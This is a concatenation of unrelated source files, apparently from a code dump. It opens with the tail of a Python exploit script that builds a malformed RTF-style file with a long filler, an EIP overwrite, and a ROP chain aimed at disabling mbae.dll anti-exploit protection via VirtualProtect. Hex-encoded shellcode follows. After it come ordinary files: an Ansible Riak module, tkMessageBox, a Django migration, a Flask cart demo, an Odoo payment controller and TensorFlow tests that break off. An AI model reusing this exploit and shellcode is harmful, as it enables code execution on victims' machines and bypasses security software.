..........Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd\cf0\ulnone\b0\i0\f0\fs20\par{\shp{\sp{\sn9pFRagMEnTS}{\*\*\*}{{{\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a}{{{{{\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a}}}{\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a}}}}{\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a}}{\*\*\sv {\*}9;2;a123456789.##########################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################050000000000000000000000000000000000000000"
file+=b'd9808878' #EIP
file+="9149414941444347FFFFFFFFFFFAFFFFBFFFFFFF"
magic_offset = 0x4cc90
rop_gadgets = [
0x78833e3c, # POP EAX # RETN
0x78801108, # GetModuleHandle Address
0x78830e9a, # MOV EAX,[EAX] # RETN
0x788543e9, # XCHG EAX,EDX # RETN
0x7882ab5d, # PUSH ESP # POP ESI # RETN
0x788e4a48, # XCHG EAX,ESI # RETN
0x788079f0, # POP EBP # RETN
0x00000098, # offset from esp pointing towards mbae.dll
0x788d0ba7, # ADD EAX,EBP # RETN # eax points to mbae.dll
0x7889363e, # POP ECX # RETN
0x7889363f, # RETN
0x788fad49, # POP EDI # RETN
0x7889363f, # RETN
0x7880126c, # POP ESI # RETN
0x7888e209, # ADD ESP,0xC
0x788172ee, # PUSHAD # RETN #EAX gets base address of mbae.dll
0x788079f0, # POP EBP # RETN
magic_offset,
0x788d0ba7, # ADD EAX,EBP # RETN # eax points to magic offset
0x7880A254, # POP EDX, RETN
0x00000000, # NULL
0x78907a82, # MOV [EAX],EDX # RETN
0x7887b821, # ADD EAX,4 # RETN
0x78830e9a, # MOV EAX,[EAX] # RETN
0x78907a82, # MOV [EAX],EDX # RETN
0x78833e3c, # POP EAX # RETN
0x788011c0, # ptr to VirtualProtect()
0x788b53d1, # MOV EAX,DWORD PTR DS:[EAX] # RETN
0x788e4a48, # XCHG EAX,ESI # RETN
0x78832a79, # POP EBX # RETN
0x00000201, # 0x00000201-> ebx
0x7880a254, # POP EDX # RETN
0x00000040, # 0x00000040-> edx
0x78854775, # POP EBP # RETN
0x788b7b2b, # jmp esp
0x7889363e, # POP ECX # RETN
0x78922ad5, # &Writable location msxml5.dll
0x788fad49, # POP EDI # RETN
0x788880d4, # RETN (ROP NOP)
0x78833e3c, # POP EAX # RETN
0x90909090, # nop
0x788172ee, # PUSHAD # RETN
]
rop=''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop= binascii.hexlify(rop)
payload=rop
payload+= b'9090eb09' # eb 09 to jump over mbae.dll's ascii
payload+= b'6d6261652e646c6c00909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090'
shellcode= b'fce8890000006089e531d2648b52308b520c8b52148b72280fb74a2631ff31c0ac3c617c022c20c1cf0d01c7e2f052578b52108b423c01d08b407885c0744a01d0508b48188b582001d3e33c498b348b01d631ff31c0acc1cf0d01c738e075f4037df83b7d2475e2588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe0585f5a8b12eb865d6a018d85b90000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c6300'
payload+=shellcode
nxt="{}}}}}{}{}{{{{{}}}}}}"
nxt+="\x0d\x0a"
nxt+="}"
nxt+="\x0d\x0a\x00"
buff="If Peter Piper picked a pack of pickled peppers, how many pickled peppers did Peter Piper pick??????"*100
textfile = open(filename , 'w')
textfile.write(file+payload+nxt+buff)
textfile.close()
| mit |
spirali/elphie | elphie/textparser.py | 1 | 1946 |
def normalize_tokens(tokens):
# Remove empty texts
tokens = [kv for kv in tokens if kv[0] != "text" or kv[1]]
# Merge lines
i = 1
while i < len(tokens):
token_name, value = tokens[i]
if token_name == "newline" and tokens[i - 1][0] == "newline":
value2 = tokens[i - 1][1]
del tokens[i]
del tokens[i - 1]
tokens.insert(i - 1, ("newline", value + value2))
continue
i += 1
# Remove trailing empty lines
if tokens and tokens[-1][0] == "newline":
tokens = tokens[:-1]
return tokens
def parse_text(text, escape_char="~", begin_char="{", end_char="}"):
result = []
start = 0
i = 0
counter = 0
while i < len(text):
c = text[i]
if c == escape_char:
result.append(("text", text[start:i]))
i += 1
start = i
while i < len(text) and text[i] != begin_char:
i += 1
result.append(("begin", text[start:i]))
i += 1
start = i
counter += 1
elif c == end_char:
result.append(("text", text[start:i]))
result.append(("end", None))
i += 1
start = i
counter -= 1
if counter < 0:
raise Exception("Invalid format, too many closing characters")
else:
i += 1
if i != start:
result.append(("text", text[start:i]))
final_result = []
for r in result:
if r[0] != "text":
final_result.append(r)
continue
lines = r[1].split("\n")
final_result.append(("text", lines[0]))
for line in lines[1:]:
final_result.append(("newline", 1))
final_result.append(("text", line))
if counter > 0:
raise Exception("Invalid format, unclosed command")
return normalize_tokens(final_result)
| bsd-2-clause |
kennethgillen/ansible | lib/ansible/modules/database/misc/riak.py | 70 | 8254 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, James Martin <jmartin@basho.com>, Drew Kerrigan <dkerrigan@basho.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: riak
short_description: This module handles some common Riak operations
description:
- This module can be used to join nodes to a cluster, check
the status of the cluster.
version_added: "1.2"
author:
- "James Martin (@jsmartin)"
- "Drew Kerrigan (@drewkerrigan)"
options:
command:
description:
- The command you would like to perform against the cluster.
required: false
default: null
choices: ['ping', 'kv_test', 'join', 'plan', 'commit']
config_dir:
description:
- The path to the riak configuration directory
required: false
default: /etc/riak
http_conn:
description:
- The ip address and port that is listening for Riak HTTP queries
required: false
default: 127.0.0.1:8098
target_node:
description:
- The target node for certain operations (join, ping)
required: false
default: riak@127.0.0.1
wait_for_handoffs:
description:
- Number of seconds to wait for handoffs to complete.
required: false
default: null
wait_for_ring:
description:
- Number of seconds to wait for all nodes to agree on the ring.
required: false
default: null
wait_for_service:
description:
- Waits for a riak service to come online before continuing.
required: false
default: None
choices: ['kv']
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
choices: ['yes', 'no']
version_added: 1.5.1
'''
EXAMPLES = '''
# Join's a Riak node to another node
- riak:
command: join
target_node: riak@10.1.1.1
# Wait for handoffs to finish. Use with async and poll.
- riak:
wait_for_handoffs: yes
# Wait for riak_kv service to startup
- riak:
wait_for_service: kv
'''
import time
import socket
import sys
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
# Let snippet from module_utils/basic.py return a proper error in this case
pass
def ring_check(module, riak_admin_bin):
cmd = '%s ringready' % riak_admin_bin
rc, out, err = module.run_command(cmd)
if rc == 0 and 'TRUE All nodes agree on the ring' in out:
return True
else:
return False
def main():
module = AnsibleModule(
argument_spec=dict(
command=dict(required=False, default=None, choices=[
'ping', 'kv_test', 'join', 'plan', 'commit']),
config_dir=dict(default='/etc/riak', type='path'),
http_conn=dict(required=False, default='127.0.0.1:8098'),
target_node=dict(default='riak@127.0.0.1', required=False),
wait_for_handoffs=dict(default=False, type='int'),
wait_for_ring=dict(default=False, type='int'),
wait_for_service=dict(
required=False, default=None, choices=['kv']),
validate_certs = dict(default='yes', type='bool'))
)
command = module.params.get('command')
config_dir = module.params.get('config_dir')
http_conn = module.params.get('http_conn')
target_node = module.params.get('target_node')
wait_for_handoffs = module.params.get('wait_for_handoffs')
wait_for_ring = module.params.get('wait_for_ring')
wait_for_service = module.params.get('wait_for_service')
validate_certs = module.params.get('validate_certs')
#make sure riak commands are on the path
riak_bin = module.get_bin_path('riak')
riak_admin_bin = module.get_bin_path('riak-admin')
timeout = time.time() + 120
while True:
if time.time() > timeout:
module.fail_json(msg='Timeout, could not fetch Riak stats.')
(response, info) = fetch_url(module, 'http://%s/stats' % (http_conn), force=True, timeout=5)
if info['status'] == 200:
stats_raw = response.read()
break
time.sleep(5)
# here we attempt to load those stats,
try:
stats = json.loads(stats_raw)
except:
module.fail_json(msg='Could not parse Riak stats.')
node_name = stats['nodename']
nodes = stats['ring_members']
ring_size = stats['ring_creation_size']
rc, out, err = module.run_command([riak_bin, 'version'] )
version = out.strip()
result = dict(node_name=node_name,
nodes=nodes,
ring_size=ring_size,
version=version)
if command == 'ping':
cmd = '%s ping %s' % ( riak_bin, target_node )
rc, out, err = module.run_command(cmd)
if rc == 0:
result['ping'] = out
else:
module.fail_json(msg=out)
elif command == 'kv_test':
cmd = '%s test' % riak_admin_bin
rc, out, err = module.run_command(cmd)
if rc == 0:
result['kv_test'] = out
else:
module.fail_json(msg=out)
elif command == 'join':
if nodes.count(node_name) == 1 and len(nodes) > 1:
result['join'] = 'Node is already in cluster or staged to be in cluster.'
else:
cmd = '%s cluster join %s' % (riak_admin_bin, target_node)
rc, out, err = module.run_command(cmd)
if rc == 0:
result['join'] = out
result['changed'] = True
else:
module.fail_json(msg=out)
elif command == 'plan':
cmd = '%s cluster plan' % riak_admin_bin
rc, out, err = module.run_command(cmd)
if rc == 0:
result['plan'] = out
if 'Staged Changes' in out:
result['changed'] = True
else:
module.fail_json(msg=out)
elif command == 'commit':
cmd = '%s cluster commit' % riak_admin_bin
rc, out, err = module.run_command(cmd)
if rc == 0:
result['commit'] = out
result['changed'] = True
else:
module.fail_json(msg=out)
# this could take a while, recommend to run in async mode
if wait_for_handoffs:
timeout = time.time() + wait_for_handoffs
while True:
cmd = '%s transfers' % riak_admin_bin
rc, out, err = module.run_command(cmd)
if 'No transfers active' in out:
result['handoffs'] = 'No transfers active.'
break
time.sleep(10)
if time.time() > timeout:
module.fail_json(msg='Timeout waiting for handoffs.')
if wait_for_service:
cmd = [riak_admin_bin, 'wait_for_service', 'riak_%s' % wait_for_service, node_name ]
rc, out, err = module.run_command(cmd)
result['service'] = out
if wait_for_ring:
timeout = time.time() + wait_for_ring
while True:
if ring_check(module, riak_admin_bin):
break
time.sleep(10)
if time.time() > timeout:
module.fail_json(msg='Timeout waiting for nodes to agree on ring.')
result['ring_ready'] = ring_check(module, riak_admin_bin)
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
if __name__ == '__main__':
main()
| gpl-3.0 |
beiko-lab/gengis | bin/Lib/lib-tk/tkMessageBox.py | 9 | 3821 | # tk common message boxes
#
# this module provides an interface to the native message boxes
# available in Tk 4.2 and newer.
#
# written by Fredrik Lundh, May 1997
#
#
# options (all have default values):
#
# - default: which button to make default (one of the reply codes)
#
# - icon: which icon to display (see below)
#
# - message: the message to display
#
# - parent: which window to place the dialog on top of
#
# - title: dialog title
#
# - type: dialog type; that is, which buttons to display (see below)
#
from tkCommonDialog import Dialog
#
# constants
# icons
ERROR = "error"
INFO = "info"
QUESTION = "question"
WARNING = "warning"
# types
ABORTRETRYIGNORE = "abortretryignore"
OK = "ok"
OKCANCEL = "okcancel"
RETRYCANCEL = "retrycancel"
YESNO = "yesno"
YESNOCANCEL = "yesnocancel"
# replies
ABORT = "abort"
RETRY = "retry"
IGNORE = "ignore"
OK = "ok"
CANCEL = "cancel"
YES = "yes"
NO = "no"
#
# message dialog class
class Message(Dialog):
"A message box"
command = "tk_messageBox"
#
# convenience stuff
# Rename _icon and _type options to allow overriding them in options
def _show(title=None, message=None, _icon=None, _type=None, **options):
if _icon and "icon" not in options: options["icon"] = _icon
if _type and "type" not in options: options["type"] = _type
if title: options["title"] = title
if message: options["message"] = message
res = Message(**options).show()
# In some Tcl installations, yes/no is converted into a boolean.
if isinstance(res, bool):
if res:
return YES
return NO
# In others we get a Tcl_Obj.
return str(res)
def showinfo(title=None, message=None, **options):
"Show an info message"
return _show(title, message, INFO, OK, **options)
def showwarning(title=None, message=None, **options):
"Show a warning message"
return _show(title, message, WARNING, OK, **options)
def showerror(title=None, message=None, **options):
"Show an error message"
return _show(title, message, ERROR, OK, **options)
def askquestion(title=None, message=None, **options):
"Ask a question"
return _show(title, message, QUESTION, YESNO, **options)
def askokcancel(title=None, message=None, **options):
"Ask if operation should proceed; return true if the answer is ok"
s = _show(title, message, QUESTION, OKCANCEL, **options)
return s == OK
def askyesno(title=None, message=None, **options):
"Ask a question; return true if the answer is yes"
s = _show(title, message, QUESTION, YESNO, **options)
return s == YES
def askyesnocancel(title=None, message=None, **options):
"Ask a question; return true if the answer is yes, None if cancelled."
s = _show(title, message, QUESTION, YESNOCANCEL, **options)
# s might be a Tcl index object, so convert it to a string
s = str(s)
if s == CANCEL:
return None
return s == YES
def askretrycancel(title=None, message=None, **options):
"Ask if operation should be retried; return true if the answer is yes"
s = _show(title, message, WARNING, RETRYCANCEL, **options)
return s == RETRY
# --------------------------------------------------------------------
# test stuff
if __name__ == "__main__":
print "info", showinfo("Spam", "Egg Information")
print "warning", showwarning("Spam", "Egg Warning")
print "error", showerror("Spam", "Egg Alert")
print "question", askquestion("Spam", "Question?")
print "proceed", askokcancel("Spam", "Proceed?")
print "yes/no", askyesno("Spam", "Got it?")
print "yes/no/cancel", askyesnocancel("Spam", "Want it?")
print "try again", askretrycancel("Spam", "Try again?")
| gpl-3.0 |
whitewhim2718/python-qinfer | src/qinfer/_lib/__init__.py | 3 | 1155 | #!/usr/bin/python
# -*- coding: utf-8 -*-
##
# _lib/: Copies of external libraries used by QInfer, such as docopt.
# Note that all other files in this directory are copyrighted and
# licensed as described within each file, or by the corresponding
# LICENSE and/or COPYING files.
##
# © 2012 Chris Ferrie (csferrie@gmail.com) and
# Christopher E. Granade (cgranade@gmail.com)
#
# This file is a part of the Qinfer project.
# Licensed under the AGPL version 3.
##
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##
| agpl-3.0 |
fosfataza/protwis | ligand/migrations/0001_initial.py | 3 | 6236 | # Generated by Django 2.0.1 on 2018-01-17 13:57
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('common', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='AssayExperiment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('assay_type', models.CharField(max_length=10)),
('assay_description', models.TextField(max_length=1000)),
('pchembl_value', models.DecimalField(decimal_places=3, max_digits=9)),
('published_value', models.DecimalField(decimal_places=3, max_digits=9)),
('published_relation', models.CharField(max_length=10)),
('published_type', models.CharField(max_length=20)),
('published_units', models.CharField(max_length=20)),
('standard_value', models.DecimalField(decimal_places=3, max_digits=9)),
('standard_relation', models.CharField(max_length=10)),
('standard_type', models.CharField(max_length=20)),
('standard_units', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='ChemblAssay',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('assay_id', models.CharField(max_length=50, unique=True)),
('web_links', models.ManyToManyField(to='common.WebLink')),
],
options={
'db_table': 'chembl_assays',
},
),
migrations.CreateModel(
name='Ligand',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('canonical', models.NullBooleanField()),
('ambigious_alias', models.NullBooleanField()),
],
options={
'db_table': 'ligand',
},
),
migrations.CreateModel(
name='LigandProperities',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('smiles', models.TextField(null=True)),
('inchikey', models.CharField(max_length=50, null=True, unique=True)),
('mw', models.DecimalField(decimal_places=3, max_digits=15, null=True)),
('rotatable_bonds', models.SmallIntegerField(null=True)),
('hacc', models.SmallIntegerField(null=True)),
('hdon', models.SmallIntegerField(null=True)),
('logp', models.DecimalField(decimal_places=3, max_digits=10, null=True)),
],
options={
'db_table': 'ligand_properities',
},
),
migrations.CreateModel(
name='LigandRole',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('slug', models.SlugField(unique=True)),
('name', models.CharField(max_length=100)),
],
options={
'db_table': 'ligand_role',
},
),
migrations.CreateModel(
name='LigandType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('slug', models.SlugField(max_length=20, unique=True)),
('name', models.CharField(max_length=100)),
],
options={
'db_table': 'ligand_type',
},
),
migrations.CreateModel(
name='LigandVendorLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.CharField(max_length=300)),
('vendor_external_id', models.CharField(max_length=300)),
('sid', models.CharField(max_length=200, unique=True)),
('lp', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='vendors', to='ligand.LigandProperities')),
],
),
migrations.CreateModel(
name='LigandVendors',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('slug', models.SlugField(max_length=100, unique=True)),
('name', models.CharField(default='', max_length=200)),
('url', models.TextField(null=True)),
],
),
migrations.AddField(
model_name='ligandvendorlink',
name='vendor',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ligand.LigandVendors'),
),
migrations.AddField(
model_name='ligandproperities',
name='ligand_type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='ligand.LigandType'),
),
migrations.AddField(
model_name='ligandproperities',
name='web_links',
field=models.ManyToManyField(to='common.WebLink'),
),
migrations.AddField(
model_name='ligand',
name='properities',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ligand.LigandProperities'),
),
migrations.AddField(
model_name='assayexperiment',
name='assay',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ligand.ChemblAssay'),
),
migrations.AddField(
model_name='assayexperiment',
name='ligand',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ligand.Ligand'),
),
]
| apache-2.0 |
abacuspix/NFV_project | Build_Web_With_Flask/Building web applications with Flask_Code/chapter08/ex05.py | 1 | 1529 | # coding:utf-8
from flask import Flask, render_template, session, flash
from flask.ext.sqlalchemy import SQLAlchemy
app = Flask(__name__)
# strong secret key!!
app.config['SECRET_KEY'] = '\xa6\xb5\x0e\x7f\xd3}\x0b-\xaa\x03\x03\x82\x10\xbe\x1e0u\x93,{\xd4Z\xa3\x8f'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///ex05.sqlite'
db = SQLAlchemy(app)
class Product(db.Model):
__tablename__ = 'products'
id = db.Column(db.Integer, primary_key=True)
sku = db.Column(db.String(30), unique=True)
name = db.Column(db.String(255), nullable=False)
def __unicode__(self):
return self.name
@app.route("/cart/add/<sku>")
def add_to_cart_view(sku):
product = Product.query.filter_by(sku=sku).first()
if product is not None:
session['cart'] = session.get('cart') or dict()
item = session['cart'].get(product.sku) or dict()
item['qty'] = item.get('qty', 0) + 1
session['cart'][product.sku] = item
flash(u'%s add to cart. Total: %d' % (product, item['qty']))
return render_template('cart.html')
def init():
"""
Initializes and populates the database
"""
db.create_all()
if Product.query.count() == 0:
db.session.add_all([
Product(sku='010', name='Boots'),
Product(sku='020', name='Gauntlets'),
Product(sku='030', name='Helmets'),
])
db.session.commit()
if __name__ == '__main__':
app.debug = True
with app.test_request_context():
init()
app.run() | mit |
brijeshkesariya/odoo | addons/payment_buckaroo/controllers/main.py | 325 | 1270 | # -*- coding: utf-8 -*-
try:
import simplejson as json
except ImportError:
import json
import logging
import pprint
import werkzeug
from openerp import http, SUPERUSER_ID
from openerp.http import request
_logger = logging.getLogger(__name__)
class BuckarooController(http.Controller):
_return_url = '/payment/buckaroo/return'
_cancel_url = '/payment/buckaroo/cancel'
_exception_url = '/payment/buckaroo/error'
_reject_url = '/payment/buckaroo/reject'
@http.route([
'/payment/buckaroo/return',
'/payment/buckaroo/cancel',
'/payment/buckaroo/error',
'/payment/buckaroo/reject',
], type='http', auth='none')
def buckaroo_return(self, **post):
""" Buckaroo."""
_logger.info('Buckaroo: entering form_feedback with post data %s', pprint.pformat(post)) # debug
request.registry['payment.transaction'].form_feedback(request.cr, SUPERUSER_ID, post, 'buckaroo', context=request.context)
return_url = post.pop('return_url', '')
if not return_url:
data ='' + post.pop('ADD_RETURNDATA', '{}').replace("'", "\"")
custom = json.loads(data)
return_url = custom.pop('return_url', '/')
return werkzeug.utils.redirect(return_url)
| agpl-3.0 |
DeepThoughtTeam/tensorflow | tensorflow/python/kernel_tests/tensor_array_ops_test.py | 1 | 16965 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.tensor_array_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,g-bad-import-order
import tensorflow.python.platform
# pylint: enable=unused-import,g-bad-import-order
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import errors
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gen_data_flow_ops
class TensorArrayTest(tf.test.TestCase):
def _testTensorArrayWriteRead(self, use_gpu):
with self.test_session(use_gpu=use_gpu) as sess:
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
w0 = h.write(0, [[4.0, 5.0]])
w1 = w0.write(1, [[1.0]])
w2 = w1.write(2, -3.0)
r0 = w2.read(0)
r1 = w2.read(1)
r2 = w2.read(2)
d0, d1, d2 = sess.run([r0, r1, r2])
self.assertAllEqual([[4.0, 5.0]], d0)
self.assertAllEqual([[1.0]], d1)
self.assertAllEqual(-3.0, d2)
def testTensorArrayWriteRead(self):
self._testTensorArrayWriteRead(use_gpu=False)
self._testTensorArrayWriteRead(use_gpu=True)
def _testTensorArrayWritePack(self, tf_dtype, use_gpu):
dtype = tf_dtype.as_numpy_dtype()
with self.test_session(use_gpu=use_gpu):
h = data_flow_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
if tf_dtype == tf.string:
convert = lambda x: np.asarray(x).astype(np.str)
else:
convert = lambda x: np.asarray(x).astype(dtype)
w0 = h.write(0, convert([[4.0, 5.0]]))
w1 = w0.write(1, convert([[6.0, 7.0]]))
w2 = w1.write(2, convert([[8.0, 9.0]]))
c0 = w2.pack()
self.assertAllEqual(
convert([[[4.0, 5.0]], [[6.0, 7.0]], [[8.0, 9.0]]]), c0.eval())
def _testTensorArrayWritePackWithType(self, tf_dtype):
self._testTensorArrayWritePack(tf_dtype=tf_dtype, use_gpu=False)
self._testTensorArrayWritePack(tf_dtype=tf_dtype, use_gpu=True)
def testTensorArrayWritePack(self):
self._testTensorArrayWritePackWithType(tf.float32)
self._testTensorArrayWritePackWithType(tf.float64)
self._testTensorArrayWritePackWithType(tf.int32)
self._testTensorArrayWritePackWithType(tf.int64)
self._testTensorArrayWritePackWithType(tf.complex64)
self._testTensorArrayWritePackWithType(tf.string)
def testTensorArrayUnpackWrongMajorSizeFails(self):
with self.test_session():
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
with self.assertRaisesOpError(
r"Input value must have first dimension "
r"equal to the array size \(2 vs. 3\)"):
h.unpack([1.0, 2.0]).flow.eval()
def testTensorArrayPackNotAllValuesAvailableFails(self):
with self.test_session():
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
with self.assertRaisesOpError(
"Could not read from TensorArray index 1 "
"because it has not yet been written to."):
h.write(0, [[4.0, 5.0]]).pack().eval()
def _testTensorArrayUnpackRead(self, tf_dtype, use_gpu):
dtype = tf_dtype.as_numpy_dtype()
with self.test_session(use_gpu=use_gpu) as sess:
h = data_flow_ops.TensorArray(
dtype=tf_dtype, tensor_array_name="foo", size=3)
if tf_dtype == tf.string:
convert = lambda x: np.asarray(x).astype(np.str)
else:
convert = lambda x: np.asarray(x).astype(dtype)
# Unpack a vector into scalars
w0 = h.unpack(convert([1.0, 2.0, 3.0]))
r0 = w0.read(0)
r1 = w0.read(1)
r2 = w0.read(2)
d0, d1, d2 = sess.run([r0, r1, r2])
self.assertAllEqual(convert(1.0), d0)
self.assertAllEqual(convert(2.0), d1)
self.assertAllEqual(convert(3.0), d2)
# Unpack a matrix into vectors
w1 = h.unpack(convert([[1.0, 1.1], [2.0, 2.1], [3.0, 3.1]]))
r0 = w1.read(0)
r1 = w1.read(1)
r2 = w1.read(2)
d0, d1, d2 = sess.run([r0, r1, r2])
self.assertAllEqual(convert([1.0, 1.1]), d0)
self.assertAllEqual(convert([2.0, 2.1]), d1)
self.assertAllEqual(convert([3.0, 3.1]), d2)
def _testTensorArrayUnpackReadWithType(self, tf_dtype):
self._testTensorArrayUnpackRead(tf_dtype=tf_dtype, use_gpu=False)
self._testTensorArrayUnpackRead(tf_dtype=tf_dtype, use_gpu=True)
def testTensorArrayUnpackRead(self):
self._testTensorArrayUnpackReadWithType(tf.float32)
self._testTensorArrayUnpackReadWithType(tf.float64)
self._testTensorArrayUnpackReadWithType(tf.int32)
self._testTensorArrayUnpackReadWithType(tf.int64)
self._testTensorArrayUnpackReadWithType(tf.complex64)
self._testTensorArrayUnpackReadWithType(tf.string)
def _testTensorGradArrayWriteRead(self, use_gpu):
